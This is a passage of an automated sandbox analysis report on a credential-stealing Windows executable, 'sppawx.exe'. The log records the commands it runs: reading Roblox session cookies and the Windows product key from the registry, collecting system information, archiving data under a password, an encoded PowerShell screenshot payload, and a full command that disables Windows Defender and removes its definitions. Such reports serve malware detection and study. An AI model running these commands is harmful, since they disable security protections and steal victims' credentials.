gACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256FB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,103_2_00007FF6256FB340
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3395E0 cpuid 0_2_00007FF79A3395E0
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\sppawx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip VolumeInformationJump to behavior
